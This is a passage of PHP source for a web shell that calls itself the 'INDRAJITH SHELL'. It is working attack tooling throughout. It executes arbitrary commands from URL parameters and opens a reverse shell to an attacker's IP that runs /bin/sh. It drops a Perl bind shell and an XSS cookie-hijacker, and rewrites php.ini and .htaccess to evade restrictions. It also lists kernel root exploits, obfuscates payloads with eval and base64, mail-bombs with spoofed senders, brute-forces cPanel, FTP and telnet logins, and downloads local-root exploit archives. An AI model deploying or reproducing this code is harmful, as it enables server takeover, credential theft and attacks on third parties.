chdir($_GET['path']);
$res = "";
if ($_GET['cmdexe']) {
$cmd = $_GET['cmdexe'];
}
if (function_exists('shell_exec')) {
$res = shell_exec($cmd);
} else {
if (function_exists('exec')) {
exec($cmd, $res);
$res = join("\n", $res);
} else {
if (function_exists('system')) {
ob_start();
system($cmd);
$res = ob_get_contents();
ob_end_clean();
} elseif (function_exists('passthru')) {
ob_start();
passthru($cmd);
$res = ob_get_contents();
ob_end_clean();
} else {
if (function_exists('proc_open')) {
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$handle = proc_open($cmd, $descriptorspec, $pipes);
if (is_resource($handle)) {
if (function_exists('fread') && function_exists('feof')) {
while (!feof($pipes[1])) {
$res .= fread($pipes[1], 512);
}
} else {
if (function_exists('fgets') && function_exists('feof')) {
while (!feof($pipes[1])) {
$res .= fgets($pipes[1], 512);
}
}
}
}
pclose($handle);
} else {
if (function_exists('popen')) {
$handle = popen($cmd, "r");
if (is_resource($handle)) {
if (function_exists('fread') && function_exists('feof')) {
while (!feof($handle)) {
$res .= fread($handle, 512);
}
} else {
if (function_exists('fgets') && function_exists('feof')) {
while (!feof($handle)) {
$res .= fgets($handle, 512);
}
}
}
}
pclose($handle);
}
}
}
}
}
$res = wordwrap(htmlspecialchars($res));
if ($_GET['cmdexe']) {
echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>" . $res . "</font></pre></div>";
}
return $res;
}
function upload_file()
{
chdir($_POST['path']);
if (move_uploaded_file($_FILES['upload_f']['tmp_name'], $_FILES['upload_f']['name'])) {
alert("Uploaded File Successfully");
} else {
alert("Access Denied!!!");
}
}
function reverse_conn_ui()
{
global $your_ip;
echo "<div id='result'>\r\n <center><h2>Reverse Shell</h2><hr />\r\n <br /><br /><form method='GET'><table class=tbl>\r\n <tr>\r\n <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>\r\n <option>PHP Reverse Shell</option>\r\n <option>PERL Bind Shell</option>\r\n </select></td></tr><tr>\r\n <td>Your IP : <input name='my_ip' value=" . $your_ip . ">\r\n PORT : <input name='my_port' value='560'>\r\n <input type='submit' value=' >> ' /></td></tr></form>\r\n <tr></tr>\r\n <tr><td><font color=red>PHP Reverse Shell</font> : <font color=green> nc -l -p <i>port</i></font></td></tr><tr><td><font color=red>PERL Bind Shell</font> : <font color=green> nc <i>server_ip port</i></font></td></tr></table> </div>";
}
function reverse_conn_bg()
{
global $os;
$option = $_REQUEST['rev_option'];
$ip = $_GET['my_ip'];
$port = $_GET['my_port'];
if ($option == "PHP Reverse Shell") {
echo "<div id=result><h2>RESULT</h2><hr /><br />";
function printit($string)
{
if (!$daemon) {
print "{$string}\n";
}
}
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0);
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("{$errstr} ({$errno})");
exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("<font color=green>Successfully opened reverse shell to {$ip}:{$port} </font>");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) {
printit("SOCK READ");
}
$input = fread($sock, $chunk_size);
if ($debug) {
printit("SOCK: {$input}");
}
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) {
printit("STDOUT READ");
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
printit("STDOUT: {$input}");
}
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) {
printit("STDERR READ");
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
printit("STDERR: {$input}");
}
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo "<br /><br /><hr /><br /><br /></div>";
} else {
if ($option == "PERL Bind Shell") {
global $bind_perl, $os;
$pbfl = $bind_perl;
$handlr = fopen("indrajith_perl_bind.pl", "wb");
if ($handlr) {
fwrite($handlr, gzinflate(base64_decode($bind_perl)));
} else {
alert("Access Denied for create new file");
}
fclose($handlr);
if (file_exists("indrajith_perl_bind.pl")) {
if ($os == "nix") {
cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl {$port}");
} else {
cmd("perl indrajith_perl_bind.pl {$port}");
}
}
}
}
}
function cookie_jack()
{
global $cookie_highjacker;
echo "<div id=result><center><h2>NOTICE</h2><hr/>";
if (function_exists('fopen') && function_exists('fwrite')) {
$cook = gzinflate(base64_decode($cookie_highjacker));
$han_le = fopen("jith_cookie.php", "w+");
if ($han_le) {
fwrite($han_le, $cook);
echo "Yes... Cookie highjacker is generated.<br /> Name : <a style='color:green;' target=_blank href=jith_cookie.php>jith_cookie.php</a></font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is usefull in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
} else {
echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
}
}
}
function safe_mode_fuck()
{
global $s_php_ini, $s_htaccess, $s_htaccess_pl, $ini_php;
$path = chdir($_GET['path']);
chdir($_GET['path']);
switch ($_GET['safe_mode']) {
case "s_php_ini":
$s_file = $s_php_ini;
$s_name = "php.ini";
break;
case "s_htaccess":
$s_name = ".htaccess";
$s_file = $s_htaccess;
break;
case "s_htaccess_pl":
$s_name = ".htaccess";
$s_file = $s_htaccess_pl;
break;
case "s_ini_php":
$s_name = "ini.php";
$s_file = $ini_php;
break;
}
if (function_exists('fopen') && function_exists('fwrite')) {
$s_handle = fopen("{$s_name}", "w+");
if ($s_handle) {
fwrite($s_handle, $s_file);
alert("Operation Succeed!!!");
} else {
alert("Access Denied!!!");
}
fclose($s_handle);
}
}
function safe_mode_fuck_ui()
{
global $path;
$path = getcwd();
echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />\r\n <table class=tbl size=10><tr><td><a href=?path={$path}&safe_mode=s_php_ini>PHP.INI</a></td><td><a href=?path={$path}&safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=?path={$path}&safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
}
function AccessDenied()
{
global $path, $forbid_dir;
$path = $_GET['path'];
chdir($path);
if (function_exists('fopen') && function_exists('fwrite')) {
$forbid = fopen(".htaccess", "wb");
if ($forbid) {
fwrite($forbid, $forbid_dir);
alert("Opreation Succeeded");
} else {
alert("Access Denied");
}
fclose($forbid);
}
}
function r00t_exploit()
{
$kernel = php_uname();
$r00t_db = array('2.6.19' => 'jessica', '2.6.20' => 'jessica', '2.6.21' => 'jessica', '2.6.22' => 'jessica', '2.6.23' => 'jessica, vmsplice', '2.6.24' => 'jessica, vmspice', '2.6.31' => 'enlightment', '2.6.18' => 'brk, ptrace, kmod, brk2', '2.6.17' => 'prctl3, raptor_prctl, py2', '2.6.16' => 'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit', '2.6.15' => 'py2, exp.sh, raptor, raptor2, h00lyshit', '2.6.14' => 'raptor, raptor2, h00lyshit', '2.6.13' => 'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit', '2.6.12' => 'h00lyshit', '2.6.11' => 'krad3, krad, h00lyshit', '2.6.10' => 'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2', '2.6.9' => 'exp.sh, krad3, py2, prctl3, h00lyshit', '2.6.8' => 'h00lyshit, krad, krad2', '2.6.7' => 'h00lyshit, krad, krad2', '2.6.6' => 'h00lyshit, krad, krad2', '2.6.2' => 'h00lyshit, krad, mremap_pte', '2.6.' => 'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak', '2.4.29' => 'elflbl, expand_stack, stackgrow2, uselib24, smpracer', '2.4.27' => 'elfdump, uselib24', '2.4.25' => 'uselib24', '2.4.24' => 'mremap_pte, loko, uselib24', '2.4.23' => 'mremap_pte, loko, uselib24', '2.4.22' => 'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod', '2.4.21' => 'w00t, brk, uselib24, loginx, brk2, ptrace-kmod', '2.4.20' => 'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod', '2.4.19' => 'newlocal, w00t, ave, uselib24, loginx, kmod', '2.4.18' => 'km2, w00t, uselib24, loginx, kmod', '2.4.17' => 'newlocal, w00t, uselib24, loginx, kmod', '2.4.16' => 'w00t, uselib24, loginx', '2.4.10' => 'w00t, brk, uselib24, loginx', '2.4.9' => 'ptrace24, uselib24', '2.4.' => 'kmdx, remap, pwned, ptrace_kmod, ong_bak', '2.2.25' => 'mremap_pte', '2.2.24' => 'ptrace', '2.2.' => 'rip,ptrace');
foreach ($r00t_db as $kern => $exp) {
if (strstr($kernel, $kern)) {
return $exp;
} else {
$exp = '<font color="red">Not found.</font>';
return "<font color=\"red\">Not found.</font>";
}
}
}
function php_ende_ui()
{
echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>\r\n <tr><td>\r\n Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>\r\n </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE\r\n\r\nFor Encode Input your full source code.\r\n\r\nFor Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value=' >> ' /><br /><hr /><br /><br /></form></div>";
}
function php_ende_bg()
{
$meth_d = $_POST['typed'];
$typ_d = $_POST['typenc'];
$c_ntent = $_POST['php_content'];
$c_ntent = $c_ntent;
switch ($meth_d) {
case "Encode":
switch ($typ_d) {
case "GZINFLATE":
$res_t = base64_encode(gzdeflate(trim(stripslashes($c_ntent . ' '), '<?php, ?>'), 9));
$res_t = "<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"{$res_t}\"))); ?>";
break;
case "GZUNCOMPRESS":
$res_t = base64_encode(gzcompress(trim(stripslashes($c_ntent . ' '), '<?php, ?>'), 9));
$res_t = "<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"{$res_t}\"))); ?>";
break;
case "STR_ROT13":
$res_t = trim(stripslashes($c_ntent . ' '), '<?php, ?>');
$res_t = base64_encode(str_rot13($res_t));
$res_t = "<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"{$res_t}\"))); ?>";
break;
}
break;
case "Decode":
switch ($typ_d) {
case "GZINFLATE":
$res_t = gzinflate(base64_decode($c_ntent));
break;
case "GZUNCOMPRESS":
$res_t = gzuncompress(base64_decode($c_ntent));
break;
case "STR_ROT13":
$res_t = str_rot13(base64_decode($c_ntent));
break;
}
break;
}
echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>" . htmlspecialchars($res_t) . "</textarea></center></div>";
}
function massmailer_ui()
{
echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table></td>\r\n <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table> </td></tr></table>";
}
function massmailer_bg()
{
$from = $_POST['from'];
$to = $_POST['to_mail'];
$subject = $_POST['subject_mail'];
$message = $_POST['mail_content'];
if (function_exists('mail')) {
if (mail($to, $subject, $message, "From:{$from}")) {
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
} else {
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
}
} else {
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
}
}
function mailbomb_bg()
{
$rand = rand(0, 9999999);
$to = $_POST['bomb_to'];
$from = "president_{$rand}@whitewhitehouse.gov";
$subject = $_POST['bomb_subject'] . " ID " . $rand;
$times = $_POST['bomb_no'];
$content = $_POST['bmail_content'];
if ($times == '') {
$times = 1000;
}
while ($times--) {
if (function_exists('mail')) {
if (mail($to, $subject, $message, "From:{$from}")) {
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
} else {
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
}
} else {
echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
}
}
}
/* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
/*------------------------ Credit Goes to Them ---------------------------------*/
function cpanel_check($host, $user, $pass, $timeout)
{
set_time_limit(0);
global $cpanel_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://{$host}:" . $cpanel_port);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "{$user}:{$pass}");
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if (curl_errno($ch) == 28) {
print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
exit;
} else {
if (curl_errno($ch) == 0) {
print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"green\">\r\n Cracking Success With Username "</font><font color=\"#FF0000\">{$user}</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">{$pass}</font><font color=\"#008000\">\"</font></b><br><br>";
}
}
curl_close($ch);
}
function cpanel_crack()
{
set_time_limit(0);
global $os;
echo "<div id=result>";
$cpanel_port = "2082";
$connect_timeout = 5;
if (!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) {
?>
<center>
<form method=post>
<table class=tbl>
<tr>
<td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
</tr>
<tr>
<td align=center>User names</td><td align=center>Password</td>
</tr>
<tr>
<td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
if ($os != "win") {
if (@file('/etc/passwd')) {
$users = file('/etc/passwd');
foreach ($users as $user) {
$user = explode(':', $user);
echo $user[0] . "\n";
}
} else {
$temp = "";
$val1 = 0;
$val2 = 1000;
for (; $val1 <= $val2; $val1++) {
$uid = @posix_getpwuid($val1);
if ($uid) {
$temp .= join(':', $uid) . "\n";
}
}
$temp = trim($temp);
if ($file5 = fopen("test.txt", "w")) {
fputs($file5, $temp);
fclose($file5);
$file = fopen("test.txt", "r");
while (!feof($file)) {
$s = fgets($file);
$matches = array();
$t = preg_match('/\\/(.*?)\\:\\//s', $s, $matches);
$matches = str_replace("home/", "", $matches[1]);
if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") {
continue;
}
echo $matches;
}
fclose($file);
}
}
}
?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
</tr>
<tr>
<td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
</tr>
<tr>
<td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
</tr>
<tr>
<td align=center colspan=2><input type="submit" value=" Go " class=but></td>
</tr>
</table>
</form>
</center>
<?php
} else {
if (empty($_POST['username']) || empty($_POST['password'])) {
echo "<center>Please Enter The Users or Password List</center>";
} else {
$userlist = explode("\n", $_POST['username']);
$passlist = explode("\n", $_POST['password']);
if ($_POST['cracktype'] == "ftp") {
foreach ($userlist as $user) {
$pureuser = trim($user);
foreach ($passlist as $password) {
$purepass = trim($password);
ftp_check($_POST['target'], $pureuser, $purepass, $connect_timeout);
}
}
}
if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") {
if ($cracktype == "telnet") {
$cpanel_port = "23";
} else {
$cpanel_port = "2082";
}
foreach ($userlist as $user) {
$pureuser = trim($user);
echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>\r\n Processing user {$pureuser} ...</font></b><br><br>";
foreach ($passlist as $password) {
$purepass = trim($password);
cpanel_check($_POST['target'], $pureuser, $purepass, $connect_timeout);
}
}
}
}
}
echo "</div>";
}
function get_users()
{
$userz = array();
$user = file("/etc/passwd");
foreach ($user as $userx => $usersz) {
$userct = explode(":", $usersz);
array_push($userz, $userct[0]);
}
if (!$user) {
if ($opd = opendir("/home/")) {
while (($file = readdir($opd)) !== false) {
array_push($userz, $file);
}
}
closedir($opd);
}
$userz = implode(', ', $userz);
return $userz;
}
function exploit_details()
{
global $os;
echo "<div id=result style='color:green;'><center>\r\n <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>\r\n OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . php_uname(s) . "'>" . php_uname(s) . "</td></tr>\r\n <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>" . phpversion() . ".</td></tr>\r\n <tr><td>Kernel Release : <font color=7171C6>" . php_uname(r) . "</font></td></tr>\r\n <tr><td>Kernel Version : <font color=7171C6>" . php_uname(v) . "</font></td></td>\r\n <tr><td>Machine : <font color=7171C6>" . php_uname(m) . "</font></td</tr>\r\n <tr><td>Server Software : <font color=7171C6>" . $_SERVER['SERVER_SOFTWARE'] . "</font></td</tr><tr>";
if (function_exists('apache_get_modules')) {
echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
echo implode(', ', apache_get_modules());
echo "</font></tr></td>";
}
if ($os == 'win') {
echo "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>" . cmd('net accounts') . "</pre></td></tr>\r\n <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>" . cmd('net user') . "</pre></td></tr>\r\n ";
}
if ($os == 'nix') {
echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>" . cmd('cat /etc/*-release') . "</pre></font></td></tr>\r\n <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>" . cmd('cat /etc/issue.net') . "</pre></font></td></tr>\r\n <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>" . cmd('whereis gcc') . "</pre></td></tr>\r\n <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>" . cmd('whereis perl') . "</pre></td></tr>\r\n <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>" . cmd('whereis python') . "</pre></td></tr>\r\n <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>" . cmd('whereis java') . "</pre></td></tr>\r\n <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>" . cmd('whereis apache') . "</pre></td></tr>\r\n <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>" . cmd('cat /proc/cpuinfo') . "</font></pre></td></tr>\r\n <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>" . cmd('free -m') . "</pre></td></tr>\r\n <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>" . cmd('ulimit -a') . "</pre></td></tr>";
$useful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl');
$uze = array();
foreach ($useful as $uzeful) {
if (cmd("which {$uzeful}")) {
$uze[] = $uzeful;
}
}
echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
echo implode(', ', $uze);
echo "</pre></td></tr>";
$downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror');
$uze = array();
foreach ($downloaders as $downloader) {
if (cmd("which {$downloader}")) {
$uze[] = $downloader;
}
}
echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
echo implode(', ', $uze);
echo "</pre></td></tr>";
echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>" . wordwrap(get_users()) . "</pre</font>></td></tr>\r\n <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>" . cmd('cat /etc/hosts') . "</pre></font></td></tr>";
}
echo "</table><br /><br /><hr /><br /><br />";
}
function remote_file_check_ui()
{
echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />\r\n <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>\r\n <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php\r\najithkp560.php\r\nindex.html\r\nprofile.php\r\nc99.php\r\nr57.php</textarea></td></tr>\r\n <tr><td><br /><input type='submit' value=' >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
}
function remote_file_check_bg()
{
set_time_limit(0);
$rtr = array();
echo "<div id=result><center><h2>Scanner Report</h2><hr /><br /><br /><table class=tbl>";
$webz = $_POST['rem_web'];
$uri_in = $_POST['tryzzz'];
$r_xuri = trim($uri_in);
$r_xuri = explode("\n", $r_xuri);
foreach ($r_xuri as $rty) {
$urlzzx = $webz . $rty;
if (function_exists('curl_init')) {
echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> {$urlzzx} </font></td>";
$ch = curl_init($urlzzx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($status_code == 200) {
echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
} else {
echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
}
} else {
echo "<font color=red>cURL Not Found </font>";
break;
}
}
echo "</table><br /><br /><hr /><br /><br /></div>";
}
function remote_download_ui()
{
echo "<div id=result><center><h2>Remote File Download</h2><hr /><br /><br /><table class=tbl><form method='GET'><input type=hidden name='path' value=" . getcwd() . "><tr><td><select style='color:green; background-color:black; border:1px solid #666;' name='type_r_down'><option>WGET</option><option>cURL</option></select></td></tr>\r\n <tr><td>URL <input size=50 name='rurlfile' value='ajithkp560.hostei.com/localroot/2.6.x/h00lyshit.zip'></td></tr>\r\n <tr><td><input type='submit' class='input_big' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
}
function remote_download_bg()
{
chdir($_GET['path']);
global $os;
$opt = $_GET['type_r_down'];
$rt_ffile = $_GET['rurlfile'];
$name = basename($rt_ffile);
echo "<div id=result>";
switch ($opt) {
case "WGET":
if ($os != 'win') {
cmd("wget {$rt_ffile}");
alert("Downloaded Successfully...");
} else {
alert("Its Windows OS... WGET is not available");
}
break;
case "cURL":
if (function_exists('curl_init')) {
$ch = curl_init($rt_ffile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($name, $data);
alert("Download succeeded");
} else {
alert("cURL Not Available");
}
break;
}
echo "</div>";
}
function hex_encode_ui()
{
if (isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) {
$tyx = $_POST['tyxxx'];
$rezultzz = $_POST['hexinp'];
switch ($tyx) {
case "Encode":
$rzul = PREG_REPLACE("'(.)'e", "dechex(ord('\\1'))", $rezultzz);
echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />\r\n <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>{$rzul}</textarea>\r\n <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>\r\n Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
break;
case "Decode":
$rzul = PREG_REPLACE("'([\\S,\\d]{2})'e", "chr(hexdec('\\1'))", $rezultzz);
echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />\r\n <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>{$rzul}</textarea>\r\n <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>\r\n Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
break;
}
} else {
echo "<div id=result><center><h2>HEXADECIMAL ENCODER</h2><hr /><br /><br />\r\n <textarea class='textarea_edit' spellcheck=false cols=60 rows=10>Here visible Your Result</textarea>\r\n <br /><br /><form method='POST'><select style='color:green; background-color:black; border:1px solid #666;' name='tyxxx'><option>Encode</option><option>Decode</option></select>\r\n Input : <input name='hexinp' size=50 value='input here'><input type=submit value=' >> ' /><br /><br /><hr /><br /><br /></div>";
}
}
function killme()
{
global $self;
echo "<div id=result><center><h2>Good Bye Dear</h2><hr />Dear, Good by... :( Hope You Like me...<br /><br /><br/><hr /><br /><br />";
$me = basename($self);
unlink($me);
}
function ftp_anonymous_ui()
{
echo "<div id='result'><center><h2>Anonymous FTP Scanner</h2><hr /></center><table class=tbl><form method='GET'><tr><td><textarea name='ftp_anonz' cols=40 rows=25 class='textarea_edit'>127.0.0.1\r\nftp.google.com\r\nftp.r00t.com\r\nftp.ajithkp.org\r\n...\r\n...</textarea></td></tr><tr><td><input class='input_big' type='submit' value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br />";
}
function ftp_anonymous_bg()
{
echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=table>";
$ftp_list = $_GET['ftp_anonz'];
$xftpl = trim($ftp_list);
$xftpl = explode("\n", $xftpl);
foreach ($xftpl as $xftp) {
$xftp = str_replace("ftp://", "", $xftp);
$conn_ftp = ftp_connect($xftp);
$success = ftp_login($conn_ftp, "anonymous", "");
if ($success) {
echo "<tr><td><font color=7171C6>{$xftp}</font></td><td><font color=green>Successfull</font></td></tr>";
} else {
echo "<tr><td><font color=7171C6>{$xftp}</font></td><td><font color=red>Failed</font></td></tr>";
}
}
echo "</table><br /><br /><hr /><br /><br />";
}
function mass_deface_ui()
{
